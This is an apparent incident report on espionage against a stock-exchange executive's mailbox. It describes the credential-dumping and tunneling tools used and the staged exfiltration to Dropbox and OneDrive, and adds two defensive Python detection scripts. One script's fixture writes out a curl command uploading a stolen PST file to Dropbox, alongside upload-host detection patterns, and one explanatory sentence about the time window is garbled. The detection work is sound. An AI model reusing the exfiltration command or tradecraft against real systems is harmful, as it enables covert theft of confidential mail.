Full Report
Unknown attackers spent at least five months inside the Outlook mailbox of a senior executive at a major global stock exchange, copying the inbox out in small, repeated batches and routing it through Dropbox and OneDrive so the traffic blended into normal cloud activity. Symantec and Carbon Black's Threat Hunter Team reported the campaign this week. The target selection and the patience of the operation point to espionage, not a money grab.
Analysis Summary
# Incident Report: Stealthy Espionage of Global Stock Exchange Executive
## Executive Summary
An unidentified threat actor held persistent access to a senior executive's Outlook mailbox at a major global stock exchange for more than five months. The attackers used a custom mailbox-extraction tool and pushed its output through legitimate cloud services (Dropbox and OneDrive) in small batches so that the exfiltration blended into routine cloud traffic. The campaign targeted high-value non-public information, which points to cyber-espionage rather than financial theft.
## Incident Details
- **Discovery Date:** Approximately March 2026
- **Incident Date:** October 10, 2025 – March 19, 2026
- **Affected Organization:** Unnamed Major Global Stock Exchange
- **Sector:** Financial Services / Capital Markets
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** Pre-October 10, 2025
- **Vector:** Not directly observed; most likely lateral movement from a device compromised earlier.
- **Details:** By the first recorded timestamp (October 10, 2025) the attackers were already running with SYSTEM privileges, so the actual point of entry predates the surviving evidence.
### Lateral Movement
- The attackers moved from their initial foothold to the executive's workstation and account. The evidence points to **frpc** (the client side of the open-source fast reverse proxy, frp) for tunneling traffic out to attacker infrastructure, and to **Secretsdump** (Impacket's `secretsdump.py`, which dumps SAM hashes and LSA secrets) for harvesting the credentials that made the move possible.
### Data Exfiltration/Impact
- **Nov 12, 2025:** Main exfiltration phase began.
- **Nov 2025 – Feb 17, 2026:** Small, repeated batches of mailbox data were stolen every 2-4 weeks.
- **Method:** A .NET mailbox stealer built on the commercial Aspose library (whose email component reads OST files and writes PSTs) read the executive's local Outlook data files (OST/PST) and wrote the contents out as encrypted PST archives ready for upload.
- **Volume:** Eight distinct exfiltration events covering data from August 2025 through February 2026.
### Detection & Response
- **Discovery:** Identified by Symantec and Carbon Black's Threat Hunter Team.
- **March 19, 2026:** Final observed activity involved staging a new backdoor, which was never executed, likely due to loss of access or eviction.
## Attack Methodology
- **Initial Access:** Lateral movement from another compromised asset.
- **Persistence:** Scheduled tasks disguised as legitimate services (Adobe, Lenovo, OneDrive).
- **Privilege Escalation:** A UAC (User Account Control) bypass tool was used; by the earliest recorded activity the attackers were executing as SYSTEM.
- **Defense Evasion:** Binaries renamed to mimic common software (Adobe, OneDrive); exfiltration sent to hard-coded IP addresses so that no DNS query was ever logged; uploads spread over weeks in small batches to avoid traffic spikes.
- **Credential Access:** Used **Secretsdump** and **SharpDecryptPwd** to pull Windows and application passwords.
- **Discovery:** Local reconnaissance of Outlook data files (OST/PST).
- **Lateral Movement:** frpc used to tunnel from inside the network out to attacker infrastructure, giving the operators a reverse path back into the environment.
- **Collection:** Custom tool built on the legitimate **Aspose .NET library** to programmatically read and export mailboxes.
- **Exfiltration:** Data pushed to **Dropbox** (through its HTTP API, driven with `curl`) and to a personal **OneDrive** account so that the uploads looked like ordinary cloud traffic.
- **Impact:** Focused espionage; unauthorized access to market-moving plans and non-public deal terms.
## Impact Assessment
- **Financial:** No direct "money grab" detected; potential long-term impact via insider trading or market manipulation based on stolen data.
- **Data Breach:** Near-continuous copy of a senior executive’s inbox, including contacts, calendars, and sensitive deal logic.
- **Operational:** Low immediate disruption, as the attacker prioritized stealth.
- **Reputational:** High risk due to the sensitivity of stock exchange data and market integrity.
## Indicators of Compromise
- **Network:** Connections to hard-coded Microsoft-owned OneDrive IP addresses with no preceding DNS lookup; traffic to `temp[.]sh`.
- **File:** Malicious binaries faking `Adobe Updater` and `OneDrive` executables.
- **Behavioral:**
- Unauthorized use of `curl` for file uploads.
- PST files being created by processes other than `outlook.exe`.
- Scheduled tasks named after hardware or software vendors (Lenovo, Adobe) that run binaries from user-writable paths or fire at unusual intervals.
## Response Actions
- **Containment:** Likely achieved by March 2026; the backdoor staged on March 19 was never executed, which is consistent with the attackers losing their access.
- **Eradication:** Removal of the persistent scheduled tasks and staged backdoors, together with hunting across the estate for frpc tunneling and credential-dumping tooling.
- **Recovery:** Restoration of secure configurations and rotation of credentials for all affected privileged accounts, since Secretsdump and SharpDecryptPwd output must be assumed stolen.
## Lessons Learned
- **Visibility Gaps:** DNS logs alone were insufficient because the attackers connected to hard-coded IP addresses. Connection, proxy and TLS (SNI) logs still record that traffic, and a rule that flags outbound connections never preceded by a DNS answer on the same host closes the gap.
- **Living off the Land:** Legitimate components (the Aspose library, `curl`, Dropbox, OneDrive) carried the collection and exfiltration, so signature-based detection had little to match on; the usable signal was behavioural (which process touched the mailbox files, which process ran `curl`, where the uploads went).
- **Privileged User Monitoring:** Senior executives are high-value targets and warrant dedicated behavioural monitoring, in particular for any process other than Outlook reading their local Outlook data files (OST/PST).
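The visibility gap above is closed by correlating two logs the attackers did not control. The following is an added example, not code from the Symantec/Carbon Black report: it joins constructed DNS answers (the shape of Sysmon Event ID 22 or a Zeek `dns.log`) against constructed outbound connections (Sysmon Event ID 3 or Zeek `conn.log`) and reports every egress connection whose destination was never answered by DNS on that host inside a lookback window. Hostnames, paths and addresses are invented; the IPs come from the documentation ranges 203.0.113.0/24 and 198.51.100.0/24, and the internal ranges are assumed to be RFC 1918.

```python
"""Flag outbound connections that were never preceded by a DNS answer.

Added example, not part of the report. Both logs below are constructed for
the demonstration; field order mirrors Sysmon Event ID 22 (DNS query) and
Event ID 3 (network connection).
"""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Ranges that count as "inside"; the rule is about egress, so these are
# skipped. Assumed to be RFC 1918 plus loopback for this example.
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# (timestamp, host, queried name, answered IP) -- constructed
DNS_LOG = [
    ("2025-11-12T09:00:00", "EXEC-WS01", "onedrive.live.com", "203.0.113.10"),
    ("2025-11-12T09:00:01", "EXEC-WS01", "content.dropboxapi.com", "198.51.100.20"),
]

# (timestamp, host, destination IP, destination port, image) -- constructed
CONN_LOG = [
    # Genuine OneDrive client, name resolved two seconds earlier: expected.
    ("2025-11-12T09:00:02", "EXEC-WS01", "203.0.113.10", 443,
     r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"),
    # Look-alike binary in a temp directory talking to a hard-coded address
    # in the same block with no lookup at all: the pattern the report describes.
    ("2025-11-12T09:05:00", "EXEC-WS01", "203.0.113.44", 443,
     r"C:\Users\exec\AppData\Local\Temp\OneDrive.exe"),
    # curl to an address resolved minutes earlier: not this rule's job.
    ("2025-11-12T09:06:00", "EXEC-WS01", "198.51.100.20", 443,
     r"C:\Windows\System32\curl.exe"),
    # Same address four weeks later with no fresh lookup inside the window.
    ("2025-12-10T02:00:00", "EXEC-WS01", "198.51.100.20", 443,
     r"C:\Windows\System32\curl.exe"),
    # Internal SMB traffic: skipped.
    ("2025-11-12T09:07:00", "EXEC-WS01", "10.0.0.5", 445,
     r"C:\Windows\System32\svchost.exe"),
]


def _is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_unresolved_connections(dns_log, conn_log, window_hours=24):
    """Return egress connections whose destination IP was not answered by
    DNS on the same host within `window_hours` before the connection.

    Set the window to at least the longest TTL seen in the environment, or
    a client reusing a cached answer shows up as a false positive.
    """
    window = timedelta(hours=window_hours)
    answers = defaultdict(list)                 # (host, ip) -> [(time, name)]
    for ts, host, name, ip in dns_log:
        answers[(host, ip)].append((datetime.fromisoformat(ts), name))

    findings = []
    for ts, host, ip, port, image in conn_log:
        if _is_internal(ip):
            continue
        when = datetime.fromisoformat(ts)
        prior = [name for seen, name in answers.get((host, ip), [])
                 if when - window <= seen <= when]
        if not prior:
            findings.append({"time": ts, "host": host,
                             "dst": f"{ip}:{port}", "image": image})
    return findings


if __name__ == "__main__":
    for f in find_unresolved_connections(DNS_LOG, CONN_LOG):
        print(f"{f['time']} {f['host']} -> {f['dst']} by {f['image']}")
```

Two of the five constructed connections are reported: the look-alike `OneDrive.exe` talking to an address nobody resolved, and the `curl` upload four weeks after the last lookup. Widening the window to sixty hours-per-day equivalents (here `window_hours=1440`) suppresses the second one, which is the trade-off to tune against observed TTLs before deploying the rule.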
## Recommendations
- **Endpoint Monitoring:** Alert on any process other than `outlook.exe` reading or creating Outlook data files (`.ost` and `.pst`), with an explicit allowlist for the backup, indexing and migration agents that legitimately touch them.
- **Cloud Egress Control:** Block or proxy access to personal cloud storage (Dropbox, personal OneDrive) from corporate assets, covering the providers' IP ranges as well as their hostnames, since a hard-coded address never hits a DNS-based filter.
- **Identity Security:** Enforce Multi-Factor Authentication (MFA) and audit active sessions for high-value targets regularly. MFA limits reuse of harvested credentials elsewhere; it does not stop an attacker already running as SYSTEM on the endpoint from reading the local mailbox files.
- **Behavioral Analytics:** Alert on execution of proxy and tunneling tools (frpc and similar) and credential harvesters (Secretsdump, SharpDecryptPwd), keyed on behaviour rather than file name, since the binaries in this campaign were renamed.
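The endpoint-side recommendations above reduce to a handful of hunt queries. What follows is an added example, not part of the report and not a vendor rule: three checks run over constructed Sysmon-style events covering the behaviours the report describes, namely a non-Outlook process touching OST/PST files, `curl` driving an upload to Dropbox, and vendor-named binaries or scheduled tasks living outside the directories the genuine software uses. Field names follow Sysmon (`Image`, `CommandLine`, `TargetFilename`) and Security Event ID 4698 (`TaskName`); every event, path and command line is invented, and the allowlists are assumptions to be adjusted per environment.

```python
"""Endpoint hunt for the report's tradecraft over constructed events.

Added example, not from the report. Events, paths, task names and the
allowlists below are invented for the demonstration.
"""
import re
from pathlib import PureWindowsPath

# Processes expected to open Outlook data files; extend with the backup,
# indexing or migration agents actually deployed (assumed list).
ALLOWED_OST_PST_READERS = {"outlook.exe", "searchindexer.exe"}
# Vendor names the attackers borrowed for their task and binary names.
VENDOR_NAMES = ("adobe", "lenovo", "onedrive")
# Where the genuine software lives; the last entry is the per-user OneDrive
# install location. Anything vendor-named outside these roots is suspect.
TRUSTED_LOCATION_RES = [re.compile(p) for p in (
    r"^c:\\program files( \(x86\))?\\",
    r"^c:\\windows\\",
    r"^c:\\users\\[^\\]+\\appdata\\local\\microsoft\\onedrive\\",
)]
OUTLOOK_DATA_RE = re.compile(r"\.(ost|pst)$", re.IGNORECASE)
UPLOAD_HOSTS = ("content.dropboxapi.com", "api.dropboxapi.com", "temp.sh")
UPLOAD_FLAG_RE = re.compile(r"(^|\s)(-T|--upload-file|--data-binary|-F)(\s|$)")

OST = r"C:\Users\exec\AppData\Local\Microsoft\Outlook\exec@exchange.example.ost"
EVENTS = [  # constructed
    # "file" models EDR file-open telemetry; Sysmon Event ID 11 alone only
    # records creation, enough for the PST output but not for OST reads.
    {"Kind": "file", "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": OST},
    {"Kind": "file", "Image": r"C:\Users\exec\AppData\Local\Temp\OneDriveUpdate.exe",
     "TargetFilename": OST},
    {"Kind": "file", "Image": r"C:\Users\exec\AppData\Local\Temp\OneDriveUpdate.exe",
     "TargetFilename": r"C:\Users\exec\AppData\Local\Temp\out-2025-11.pst"},
    # Process creation (Sysmon Event ID 1).
    {"Kind": "process", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -X POST https://content.dropboxapi.com/2/files/upload "
                    '-H "Authorization: Bearer <token>" '
                    "--data-binary @C:\\Users\\exec\\AppData\\Local\\Temp\\out-2025-11.pst"},
    {"Kind": "process", "Image": r"C:\Users\exec\AppData\Roaming\AdobeUpdater.exe",
     "CommandLine": "AdobeUpdater.exe"},
    {"Kind": "process", "Image": r"C:\Users\exec\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "CommandLine": "OneDrive.exe /background"},
    # Scheduled task creation (Security Event ID 4698): name and action path.
    {"Kind": "task", "TaskName": r"\Lenovo\LenovoSystemUpdate",
     "Action": r"C:\Users\exec\AppData\Local\Temp\lsu.exe"},
    {"Kind": "task", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "Action": r"C:\Windows\System32\defrag.exe"},
]


def _basename(path):
    return PureWindowsPath(path).name.lower()


def _trusted_location(path):
    return any(r.match(path.lower()) for r in TRUSTED_LOCATION_RES)


def check_file(ev):
    """Outlook data file touched by something other than an allowed reader."""
    if (OUTLOOK_DATA_RE.search(ev["TargetFilename"])
            and _basename(ev["Image"]) not in ALLOWED_OST_PST_READERS):
        return ("outlook-data-file-access", ev["Image"], ev["TargetFilename"])
    return None


def check_process(ev):
    """curl pushing data to a known upload host, or a vendor-named binary
    running from somewhere the vendor never installs to."""
    name, cmd = _basename(ev["Image"]), ev["CommandLine"]
    if name == "curl.exe" and (any(h in cmd.lower() for h in UPLOAD_HOSTS)
                               or UPLOAD_FLAG_RE.search(cmd)):
        return ("curl-upload", ev["Image"], cmd)
    if any(v in name for v in VENDOR_NAMES) and not _trusted_location(ev["Image"]):
        return ("vendor-lookalike-binary", ev["Image"], cmd)
    return None


def check_task(ev):
    """Vendor-named scheduled task whose action runs from an untrusted path."""
    if (any(v in ev["TaskName"].lower() for v in VENDOR_NAMES)
            and not _trusted_location(ev["Action"])):
        return ("vendor-lookalike-task", ev["TaskName"], ev["Action"])
    return None


CHECKS = {"file": check_file, "process": check_process, "task": check_task}


def hunt(events):
    """Run every event through the check for its kind; return the hits."""
    return [hit for ev in events if (hit := CHECKS[ev["Kind"]](ev))]


if __name__ == "__main__":
    for rule, subject, detail in hunt(EVENTS):
        print(f"[{rule}] {subject}\n    {detail}")
```

Of the eight constructed events, five are flagged: both accesses by the fake `OneDriveUpdate.exe` (reading the OST and writing a PST to `Temp`), the `curl` upload to the Dropbox content endpoint, the `AdobeUpdater.exe` in a roaming profile, and the Lenovo-named task pointing into `Temp`. The real Outlook process, the per-user OneDrive install and the built-in defrag task pass, which is the point of keying the vendor checks on location rather than name alone.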